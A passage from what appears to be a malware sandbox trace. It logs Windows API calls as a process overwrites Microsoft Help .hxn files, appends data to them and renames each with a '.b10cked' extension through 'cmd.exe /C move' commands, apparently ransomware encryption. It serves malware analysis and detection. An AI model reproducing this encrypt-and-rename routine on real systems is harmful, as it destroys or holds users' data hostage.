lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0199.581] CloseHandle (hObject=0x120) returned 1 [0199.582] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSE1C9~1.HXN") returned 0x27 [0199.582] 
GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0199.583] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSE1C9~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO_PRM.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSE1C9~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO_PRM.14.1033.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xdb0, dwThreadId=0x91c)) returned 1 [0199.590] CloseHandle (hObject=0x1b4) returned 1 [0199.590] CloseHandle (hObject=0x120) returned 1 [0199.590] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0199.590] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0199.590] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0199.590] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.590] ReleaseMutex (hMutex=0xf8) returned 1 [0199.590] WaitForSingleObject (hHandle=0xf8, 
dwMilliseconds=0xffffffff) returned 0x0 [0199.590] ReleaseMutex (hMutex=0xf8) returned 1 [0199.590] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.590] ReleaseMutex (hMutex=0xf8) returned 1 [0199.590] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.590] ReleaseMutex (hMutex=0xf8) returned 1 [0199.590] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio_std.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0199.591] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.591] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0199.591] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.591] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25638004366) returned 1 [0199.591] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.591] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0199.591] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.591] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) 
returned 0x0 [0199.591] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0199.591] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.591] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0199.591] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x15e [0199.591] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0199.591] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.591] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0199.592] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.592] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.592] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0199.592] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.592] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.592] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0199.592] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.592] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.592] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0199.592] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.592] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.592] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0199.592] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.592] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.592] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0199.592] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.592] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, 
dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0199.592] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x15e [0199.593] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0199.593] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0199.593] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0199.593] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x15e [0199.593] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0199.593] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0199.593] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xae, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xae, lpOverlapped=0x0) returned 1 [0199.594] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0199.594] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xae, lpOverlapped=0x0) returned 1 [0199.594] SetFilePointer (in: hFile=0x120, lDistanceToMove=-174, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | 
out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb0 [0199.595] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xae, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xae, lpOverlapped=0x0) returned 1 [0199.595] SetFilePointer (in: hFile=0x120, lDistanceToMove=-174, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb0 [0199.595] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xae, lpOverlapped=0x0) returned 1 [0199.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.VISIO_STD.14.1033.hxn", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0199.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.VISIO_STD.14.1033.hxn", cchWideChar=24, lpMultiByteStr=0x132f75c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.VISIO_STD.14.1033.hxn", lpUsedDefaultChar=0x0) returned 24 [0199.600] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x15e [0199.600] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0199.600] CloseHandle (hObject=0x120) returned 1 [0199.601] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~2.HXN") returned 0x27 [0199.602] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All 
Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0199.602] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO_STD.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO_STD.14.1033.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x92c, dwThreadId=0xdb8)) returned 1 [0199.638] CloseHandle (hObject=0x1b4) returned 1 [0199.638] CloseHandle (hObject=0x120) returned 1 [0199.638] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0199.638] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0199.638] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0199.638] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.638] ReleaseMutex (hMutex=0xf8) returned 1 [0199.638] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.638] ReleaseMutex 
(hMutex=0xf8) returned 1 [0199.638] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.638] ReleaseMutex (hMutex=0xf8) returned 1 [0199.638] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.638] ReleaseMutex (hMutex=0xf8) returned 1 [0199.638] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.winproj.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0199.639] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.639] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0199.639] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.639] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25642797928) returned 1 [0199.639] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.639] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0199.639] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.639] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.639] SetFilePointer (in: hFile=0x120, 
lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0199.639] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.639] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0199.639] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x152 [0199.639] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0199.639] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.639] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0199.639] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.639] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.639] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0199.639] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.639] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.639] 
SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0199.640] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.640] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.640] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0199.640] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.640] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.640] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0199.640] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.640] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.640] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0199.640] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.640] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) 
returned 0x0 [0199.640] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x152 [0199.640] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0199.640] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0199.640] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0199.640] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x152 [0199.640] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0199.641] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0199.641] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xa8, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xa8, lpOverlapped=0x0) returned 1 [0199.642] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0199.642] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xa8, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xa8, lpOverlapped=0x0) returned 1 [0199.642] SetFilePointer (in: hFile=0x120, lDistanceToMove=-168, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xaa 
[0199.642] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xa8, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xa8, lpOverlapped=0x0) returned 1 [0199.642] SetFilePointer (in: hFile=0x120, lDistanceToMove=-168, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xaa [0199.642] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xa8, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xa8, lpOverlapped=0x0) returned 1 [0199.646] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.WINPROJ.14.1033.hxn", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0199.646] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.WINPROJ.14.1033.hxn", cchWideChar=22, lpMultiByteStr=0x1328794, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.WINPROJ.14.1033.hxn", lpUsedDefaultChar=0x0) returned 22 [0199.646] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x152 [0199.646] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: 